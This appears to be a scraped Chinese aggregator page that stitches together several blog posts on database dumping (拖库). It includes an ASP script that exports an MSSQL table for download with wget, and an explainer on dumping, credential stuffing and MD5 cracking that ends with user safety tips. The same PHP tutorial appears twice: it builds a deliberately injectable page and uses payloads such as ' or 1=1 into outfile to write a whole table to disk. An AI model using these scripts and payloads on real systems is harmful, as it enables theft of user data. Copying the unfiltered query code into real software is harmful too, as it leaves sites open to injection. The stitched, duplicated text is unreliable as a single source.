精华内容
下载资源
问答
  • 拖库

    2016-10-09 14:06:00
    aspmssql的的脚本和用法示例如下: 1 <%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>'这里改编码方式 2 <% 3 '用法:如果把本程序放在[url]http://www.xxx.com/sql.asp[/url],可以wget [url]...

    asp拖mssql的库的脚本和用法示例如下:

     1 <%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>'这里改编码方式
     2 <%
     3 '用法:如果把本程序放在[url]http://www.xxx.com/sql.asp[/url],可以wget [url]http://www.xxx.com/sql.asp[/url] -O x.csv 来直接拖库
     4         Response.Buffer = True
     5         Server.ScriptTimeout = 2147483647
     6 
     7         str="Driver={Sql Server};Server=192.168.1.5;Uid=mssql库名;Pwd=mssql密码;Database=库名" 这里是连接字符串
     8         Set Conn=Server.CreateObject("Adodb.connection")
     9         Conn.Open str
    10 
    11         Set Rs = Server.Createobject("Adodb.Recordset") 
    12 
    13         Sqlstr="SELECT  * FROM 库名.dbo.[表名]"  '这里是导哪个库哪个表的语句
    14         Rs.Open Sqlstr,Conn,3,3 
    15 
    16         If(Rs.Fields.Count > 0)Then
    17                 For I = 0 To Rs.Fields.Count - 1
    18                         Response.Write Rs.Fields(i).Name & "        "
    19                 Next
    20                 Response.Write(vbNewLine)
    21 
    22                 For I = 1 To Rs.RecordCount
    23                                         
    24                         If(I Mod 100 = 0)Then
    25                                 Response.Flush
    26                         End If
    27 
    28                         For J = 0 To Rs.Fields.Count - 1
    29                                 Response.Write Rs(J) & "        "
    30                         Next
    31 
    32                         Response.Write(vbNewLine)
    33                         
    34                         Rs.MoveNext
    35                 Next
    36         End If
    37 
    38         Rs.Close 
    39         Conn.Close
    40         If(Err <> 0)Then Response.Write(Err.Description)
    41         Set Rs = Nothing 
    42         Set Conn = Nothing 
    43 %> 

    执行后,看着wget的进度条

    转载于:https://www.cnblogs.com/jsq16/p/5942013.html

    展开全文
  • 拖库 洗库 撞库

    2019-02-20 15:53:26
    拖库 洗库 撞库
                   

           间接转载地址: http://blog.csdn.net/daliaojie/article/details/42171177


    一,背景:

    用户数据泄露一直是如今互联网世界的一个焦点,从最近的京东撞库抹黑事件,到之前的CSDN,如家用户数据的泄露,服务商和黑客之间在用户数据这个舞台上一直在进行着旷日持久的攻防战。

    对于大多数用户而言,撞库可能是一个很专业的名词,但是理解起来却比较简单,撞库是黑客无聊的“恶作剧”,黑客通过收集互联网已泄露的用户+密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登陆的用户。 

    以京东之前的撞库举例,首先京东的数据库并没有泄漏。黑客只不过通过“撞库”的手法,“凑巧”获取到了一些京东用户的数据(用户名密码),而这样的手法,几乎可以对付任何网站登录系统,用户在不同网站登录时使用相同的用户名和密码,就相当于给自己配了一把“万能钥匙”,一旦丢失,后果可想而知。所以说,防止撞库,是一场需要用户一同参与的持久战。

    关于撞库事件的始末下文中也会有详细的阐释。

    提及“撞库”,就不能不说“脱库”和“洗库”。

    在黑客术语里面,”拖库“是指黑客入侵有价值的网络站点,把注册用户的资料数据库全部盗走的行为,因为谐音,也经常被称作“脱裤”,360的库带计划,奖励提交漏洞的白帽子,也是因此而得名。在取得大量的用户数据之后,黑客会通过一系列的技术手段和黑色产业链将有价值的用户数据变现,这通常也被称作“洗库”。最后黑客将得到的数据在其它网站上进行尝试登陆,叫做”撞库“,因为很多用户喜欢使用统一的用户名密码,”撞库“也可以是黑客收获颇丰。

    下图是黑客,在“脱裤”“洗库”“撞库”三个环节所进行的活动。

    二,用户数据与黑色产业:

    随着地下产业链日渐成熟,用户数据可以被迅速地转变成现金。

    (1)用户账号中的虚拟货币,游戏账号,装备,都可以通过交易的方式变现,也就是俗称的“盗号”。(2)金融类账号比如,支付宝,网银,信用卡,股票的账号和密码,则可以用来进行金融犯罪和诈骗。(3)最后一些可归类的用户信息,如学生,打工者,老板等,多用于发送广告,垃圾短信,电商营销。也有专门的广告投放公司,花钱购买这些分门别类的信息。

    快速收益和高回报也让越来越多的黑客铤而走险。(刑法里非法入侵计算机系统罪会被判处三年到七年有期徒刑)

    而对于,信息被泄露的受害者,根据泄露信息的种类不同,生活也会受到不同程度的影响。

    如上图,如果你的多种网站和服务的用户名密码相同,那可能会蒙受更大的损失。

    三,黑客怎样获取用户数据:

    黑客为了得到数据库的访问权限,取得用户数据,通常会从技术层面和社工层面两个方向入手。

    技术方面大致分为如下几种:

    (1)远程下载数据库文件这种拖库方式的利用主要是由于管理员缺乏安全意识,在做数据库备份或是为了方便数据转移,将数据库文件直接放到了Web目录下,而web目录是没有权限控制的,任何人都可以访问的;还有就是网站使用了一些开源程序,没有修改默认的数据库;其实黑客每天都会利用扫描工具对各大网站进行疯狂的扫描,如果你的备份的文件名落在黑客的字典里,就很容易被扫描到,从而被黑客下载到本地。(2)利用web应用漏洞随着开源项目的成熟发展,各种web开源应用,开源开发框架的出现,很多初创的公司为了减少开发成本,都会直接引入了那些开源的应用,但却并不会关心其后续的安全性,而黑客们在知道目标代码后,却会对其进行深入的分析和研究,当高危的零日漏洞发现时,这些网站就会遭到拖库的危险。(3)利用web服务器漏洞Web安全实际上是Web应用和Web服务器安全的结合体;而Web服务器的安全则是由Web容器和系统安全两部分组成,系统安全通常会通过外加防火墙和屏蔽对外服务端口进行处理,但Web容器却是必须对外开放,因此如果Web容器爆出漏洞的时候,网站也会遭到拖库的危险。社工方面大概有如下几种:(1)水坑攻击黑客会利用软件或系统漏洞,在特定的网站上进行挂马,如果网站管理员在维护系统的时候不小心访问到这些网站,在没有打补丁的前提下,就会被植入木马,也会引发后续的拖库风险。(2)邮件钓鱼黑客会利用一些免杀的木马,并将其和一些管理员感兴趣的信息绑定,然后通过邮件发送给管理员,而当网站管理员下载运行后,也会导致服务器植入木马,引发后续的拖库风险。(3)社工管理员对目标网站的管理员进行社会工程学手段,获取到一些敏感后台的用户名和密码。从而引发的后续拖库。(4)XSS劫持有时黑客也会为了获取某一些网站的帐号信息,他们会利用网站钓鱼的手段去欺骗用户主动输入,但这种方式只能获取部分帐号的真实信息,并没有入侵服务器。

    四,黑客怎样解密得到的数据:

    通常情况下,数据库中的个人信息如,邮箱 电话 真实姓名 性别 等都是明文存储的。而密码通常经过MD5加密之后存储。黑客可以很轻易地把他需要的且是明文存储的数据从数据库中剥离出来。而MD5加密之后的数据这需要一定的解密流程才能看到明文。通常解密MD5的方法有,暴力破解,字典破解和彩虹表。

    (1)暴力破解

    暴力破解这是一种"时间消耗型"的破解方法,确定了密文的加密方式的前提下,使用相同的加密算法,计算

    M = H(P)

    P为所有的明文空间

    H为加密算法

    M为密文

    然后将计算得到的M和待破解的密文进行比较,如果匹配成功,则对应的明文P即为待破解密文的明文。值得注意的是,这个枚举P和比较M的过程往往是在内存中进行的,也即在计算的过程中一边产生,一边比较,这次破解结束后,下一次破解又要重新开始从头枚举,效率不太高。

    (2)字典破解

    字典破解本质上还是"暴力破解"的一种,在字典破解中,攻击者是对所有的明文(M)进行预计算,将所有的明文的HASH都事先计算好,并保存起来。典型的MD5字典如下:

    ....password  5f4dcc3b5aa765d61d8327deb882cf99admin    21232f297a57a5a743894a0e4a801fc3cnblog    efbc3548e65e7225dcf43d3918d94e6f....

    在进行破解的时候,破解程序将字典映射Mapping到内存中,然后将HASH和待破解的密文进行逐条比较(这点和暴力破解是一样的),直到找到某条HASH和待破解的密文相同为止。

    值得注意的是,基于字典的暴力破解时间上比单纯的内存计算型暴力破解更有效率,只要一次的"字典生成"花费一定的时间,后续的多次破解都可以重复使用这个字典。

    注意,这里说的"字典"指的对应某个算法的字典: MD5 Directory、SHA1 Directory、NTLM Directory等等。

    总的来说,字典攻击是对单纯的内存型暴力破解的一个改进,它引入了预处理的思想,但缺点也很明显,需要占用及其庞大的磁盘空间,以至于对于长度16以上的密码字典,完整存储根本不可能。

    (3)彩虹表

    这是对暴力破解和字典破解的一种折中的破解技术,在2003年瑞典的Philippe Oechslin 在Making a Faster Cryptanalytic Time-Memory Trade-Off一文中首次被提出,它有效的利用了预处理的优点,同时又克服了字典破解消耗太大磁盘空间的缺点,在这两者中找到了一个平衡点。(具体实现技术请读者自行百度)

    五,黑客怎样利用得到的数据:

    除了贩卖数据得到金钱上的利益之外,黑客还会把得到的数据进行整理,制作成社工库。利用社工库对其他网站进行撞库攻击。撞库攻击实质上就是,以大量的用户数据位基础,利用用户相同的注册习惯(相同的用户名和密码),尝试登陆其它的网站。

    随着社工库的日益庞大,越来越多的用户和网站受到来自撞库攻击的威胁。(现在网上流传的数据库已经超过千万级别,不过这和某些黑客手中所掌握的数据比较起来只不过是冰山一角,详情参见“道哥的黑板报:中国黑客传说:游走在黑暗中的精灵”)

    不单单是账户密码的泄露,在庞大的社工库面前,用户的个人隐私也是岌岌可危。比如如家宾馆2000w数据泄露事件,导致众多会员开房记录曝光于互联网。

    QQ群用户信息的泄露,也影响到了几乎所有QQ用户的隐私。

    再来看最近的京东撞库事件,网上流传了一张所谓的京东数据被泄露的图片,其中涉及到少量京东用户名密码。

    网上的白帽子分析了其中用户名密码的出处,发现图片中的用户名密码均在,之前别的网站泄露的数据库中存在。

    这也说明了,撞库攻击在本身拥有大量用户名密码的基础上,可以在不攻破目标系统的前提下,获取目标系统一定的用户信息。

    六,用户怎样保护自己的隐私:

    作为中国千万网民中的一个,你可能觉得,我不用网银,打游戏不充钱,我没有什么被黑的价值,所以黑客是不会来光顾我的。其实不然,每一个使用互联网服务的用户,在享受快捷方便的时候,都把自己暴漏在了风险之下。不是黑客会不会值得黑你,而是你有没有可能被波及。下面是几条建议有利于你规避风险。

    (1)重要网站/APP的密码一定要独立,猜测不到,或者用1Password这样的软件来帮你记忆;(2)电脑勤打补丁,安装一款杀毒软件;(3)尽量不使用IE浏览器(4)支持正版,因为盗版的、破解的总是各种猫腻,后门存在的可能性很大;(5)不那么可信的软件,可以安装到虚拟机里;(6)不要在公共场合(如咖啡厅、机场等)使用公共无线,自己包月3G/4G,不差钱,当然你可以用公共无线做点无隐私的事,如下载部电影之类的;(7)自己的无线AP,用安全的加密方式(如WPA2),密码复杂些;(8)离开电脑时,记得按下Win(Windows图标那个键)+L键,锁屏,这个习惯非常非常关键;


               

    再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

    展开全文
  • 利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度,正如文章开头所说,权当总结,别无它意想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库同上一篇文章一样,...

    利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度,正如文章开头所说,权当总结,别无它意

    想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库

    同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。

    在数据库中建立一张表:

    CREATE TABLE `article` (

    `articleid` int(11) NOT NULL AUTO_INCREMENT,

    `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',

    `content` text CHARACTER SET utf8 NOT NULL,

    PRIMARY KEY (`articleid`)

    ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

    在表中插入数据的操作我就不贴代码了,可以去下载下来直接导入到数据库。

    接下来,写一个处理用户请求的页面,这里,我们故意不过滤用户提交过来的数据,留下个SQL注入漏洞用来测试。

    代码如下:

    $servername = "localhost";

    $dbusername = "root";

    $dbpassword = "";

    $dbname = "test";

    $id=$_GET['id'];//id未经过滤

    $conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

    mysql_select_db($dbname,$conn);

    mysql_query('set names utf8');

    $sql = "SELECT * FROM article WHERE articleid='$id'";

    $result = mysql_query($sql,$conn);

    $row = mysql_fetch_array($result);

    echo "

    利用SQL注入漏洞拖库

    ";

    if (!$row){

    echo "该记录不存在";

    exit;

    }

    echo "标题
    ".$row['title']."

    ";

    echo "内容
    ".$row['content']."

    ";

    ?>

    我们直接在浏览器中输入:

    http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1

    即可访问article表中id为1的一条记录

    访问结果如下:

    576da0c8af5db51d454e1953a4f673e3.png接下来,我们就利用这个漏洞(不知道该漏洞的情况下,只能通过工具+手工检测),演示一下如何将article表下载下来。

    在地址栏中输入:' into outfile 'e:/sql.txt'%23

    分析:%23是#的ASCII码,由于在地址栏中直接输入#后到数据库系统中会变成空,需要在地址栏中输入%23,那么才会变成#,进而注释掉后面的sql语句。

    运行之后,打开E盘,发现多了一个sql.txt文件,打开之后,里面就是表article中的一条记录。

    为什么只有一条记录呢?难道该数据表就只有一条记录?不是这样的,因为我们只检索id为1的一条记录而已,那么能否将article表中的所有记录一次性全部下载下来呢?

    答案是可以的,只要你的构造的SQL语句足够灵活(再次提出了构造SQL语句的灵活性)。

    分析一下,当在URL地址栏中输入'into outfile 'e:/sql.txt'%23的时候,合并到sql查询语句中变为:

    SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'

    仔细分析下之后,我们可以这样子构造SQL语句:

    SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'

    这样的话,无论如何WHERE子句总是为真,换句话说,该sql语句等价于如下:

    SELECT * FROM article into outfile 'e:/whf.txt'#'

    懂了吧,该sql语句在先执行select语句,将表article中的所以内容全部检索出来,然后再执行into outfile 'e:/whf.txt'#'将内容导出来。

    不信的话,你执行下……

    利用SQL注入漏洞,我们可以猜测表名,列名,用户的密码长度(LEFT函数)等等,当然了,如果能直接向以上的演示那样将表中的数据全部导出的话就没必要去猜表名列名等等。

    有点累了,就写到这里了。

    利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度,正如文章开头所说,权当总结,别无它意。

    展开全文
  • 想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库同上一篇文章(利用SQL注入漏洞登录后台)一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。在数据库中建立一张表:CREATE TABLE `article` ...

    想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库

    同上一篇文章(利用SQL注入漏洞登录后台)一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。

    在数据库中建立一张表:

    CREATE TABLE `article` (

    `articleid` int(11) NOT NULL AUTO_INCREMENT,

    `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',

    `content` text CHARACTER SET utf8 NOT NULL,

    PRIMARY KEY (`articleid`)

    ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

    在表中插入数据的操作我就不贴代码了,可以去下载下来直接导入到数据库。

    接下来,写一个处理用户请求的页面,这里,我们故意不过滤用户提交过来的数据,留下个SQL注入漏洞用来测试。

    代码如下:

    $servername = "localhost";

    $dbusername = "root";

    $dbpassword = "";

    $dbname = "test";

    $id=$_GET['id'];//id未经过滤

    $conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

    mysql_select_db($dbname,$conn);

    mysql_query('set names utf8');

    $sql = "SELECT * FROM article WHERE articleid='$id'";

    $result = mysql_query($sql,$conn);

    $row = mysql_fetch_array($result);

    echo "

    利用SQL注入漏洞拖库

    ";

    if (!$row){

    echo "该记录不存在";

    exit;

    }

    echo "标题
    ".$row['title']."

    ";

    echo "内容
    ".$row['content']."

    ";

    ?>

    我们直接在浏览器中输入:

    即可访问article表中id为1的一条记录

    访问结果如下:

    7d6e1e58f6e0f04731c88010eb7fde1b.png

    接下来,我们就利用这个漏洞(不知道该漏洞的情况下,只能通过工具+手工检测),演示一下如何将article表下载下来。

    在地址栏中输入:’ into outfile 'e:/sql.txt'%23

    分析:%23是#的ASCII码,由于在地址栏中直接输入#后到数据库系统中会变成空,需要在地址栏中输入%23,那么才会变成#,进而注释掉后面的sql语句。

    运行之后,打开E盘,发现多了一个sql.txt文件,打开之后,里面就是表article中的一条记录。

    为什么只有一条记录呢?难道该数据表就只有一条记录?不是这样的,因为我们只检索id为1的一条记录而已,那么能否将article表中的所有记录一次性全部下载下来呢?

    答案是可以的,只要你的构造的SQL语句足够灵活(再次提出了构造SQL语句的灵活性)。

    分析一下,当在URL地址栏中输入’into outfile 'e:/sql.txt'%23的时候,合并到sql查询语句中变为:

    SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'

    仔细分析下之后,我们可以这样子构造SQL语句:

    SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'

    这样的话,无论如何WHERE子句总是为真,换句话说,该sql语句等价于如下:

    SELECT * FROM article into outfile 'e:/whf.txt'#'

    懂了吧,该sql语句在先执行select语句,将表article中的所以内容全部检索出来,然后再执行into outfile 'e:/whf.txt'#'将内容导出来。

    不信的话,你执行下……

    利用SQL注入漏洞,我们可以猜测表名,列名,用户的密码长度(LEFT函数)等等,当然了,如果能直接向以上的演示那样将表中的数据全部导出的话就没必要去猜表名列名等等。

    有点累了,就写到这里了。

    展开全文
  • 利用SQL注入漏洞拖库

    2018-12-25 16:57:42
    利用SQL注入漏洞拖库 - 利用 SQL 注入漏洞拖库的方法 1 建立数据库和表 建立数据库 lab。 在 lab 数据库创建一张表 article
  • 想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。在数据库中建立一张表:代码如下:CREATE TABLE `article` (`articleid` int...
  • --------------------------2020-02-06-----------------------武汉加油!中国加油!-----------------------今年这...你知道拖库,撞库和洗库么? 什么是拖库(因为谐音,也经常被称作“脱裤”). 拖库这个行为现在...
  • 拖库经验

    千次阅读 2018-05-18 15:22:32
    拖库经验技巧集合@mssql:【1】射点导出' and 1=2 union select 1,char(94)+CaSt(Loginname as varchar)+char(94)+CaSt(password as varchar)+char(94)+CaSt(trueName as varchar)+char(94)+CaSt(email as varchar)+...
  • 参考Aspcms框架拿webshell,该管理页面存在数据库备份模块:通过菜刀查到了...然后打开辅臣数据库软件,点击打开数据库导入mdb文件:可看到正常打开后读取到数据库所有信息:方法2:mysqldump拖库该方法在kali-lin...
  • 关于拖库和撞库

    2016-03-18 14:58:10
    拖库是指黑客盗取了网站的数据库。
  • 利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度,正如文章开头所说,权当总结,别无它意
  • 利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度。同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。在数据库中建立一张表:代码如下:CREATE ...
  • 拖库与撞库

    千次阅读 2014-11-22 20:12:59
    所谓“拖库”就是网站的用户数据被人用SQL注入或者其它手段盗取,得到了这个网站的用户名、密码信息。 将得到的数据在其它网站上进行尝试登陆,叫做“撞库”。 很多朋友还都有这样一种习惯,就是为了方便记忆,...
  • 昨天12306被拖库了,朋友圈都在传,有人不信,有人不以为然。1.什么叫拖库拖库本来是数据库领域的术语,指从数据库中导出数据。到了黑客攻击泛滥的今天,它被用来指网站遭到...
  • 拖库是指黑客盗取了网站的数据库。撞库是指黑客用拖库获得的用户名和密码在其它网站批量尝试登陆,进而盗取更有价值的东西。由于一些用户在多个网站用相同的用户名和密码,所以撞库是有一定成功率的。现在稍微有点...
  • tail.cr:Crystal的拖尾-获取和/或跟随fileIO的结尾
  • 拖库 洗库 撞库的概念

    千次阅读 2019-03-08 18:36:50
    用户数据泄露一直是如今互联网世界的一个焦点,从最近的京东撞抹黑事件,到之前的CSDN,如家用户数据的泄露,服务商和黑客之间在用户数据这个舞台上一直在进行着旷日持久的攻防战。 对于大多数用户而言,撞可能...
  • SQLMAP注入拖库过程

    2013-05-17 17:00:07
    SQLMAP注入拖库过程 http://secbeta.com/2012/sqlmap-attack-db/
  • SQLMAP注入拖库过程

    2013-05-17 17:00:00
    SQLMAP注入拖库过程 http://secbeta.com/2012/sqlmap-attack-db/
  • 所谓拖库,就是通过入侵网站,非法获取数据库内容。本文将从黑产的动机、常见手段和如何防范三个角度讲解下拖库的相关知识。 动机 黑产进行拖库的动机很多,我归纳主要有以下几种。 商业打击 主要目的不是将窃取的...
  • 撞库 拖库

    2015-01-15 18:54:00
    http://www.2cto.com/Article/201405/303738.html 转载于:https://www.cnblogs.com/pangairu/p/4227082.html
  • 撞库 拖库与洗库

    万次阅读 2014-12-26 14:19:06
    用户数据泄露一直是如今互联网世界的一个焦点,从最近的京东撞抹黑事件,到之前的CSDN,如家用户数据的泄露,服务商和黑客之间在用户数据这个舞台上一直在进行着旷日持久的攻防战。 对于大多数用户而言,撞可能...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,978
精华内容 1,191
关键字:

拖库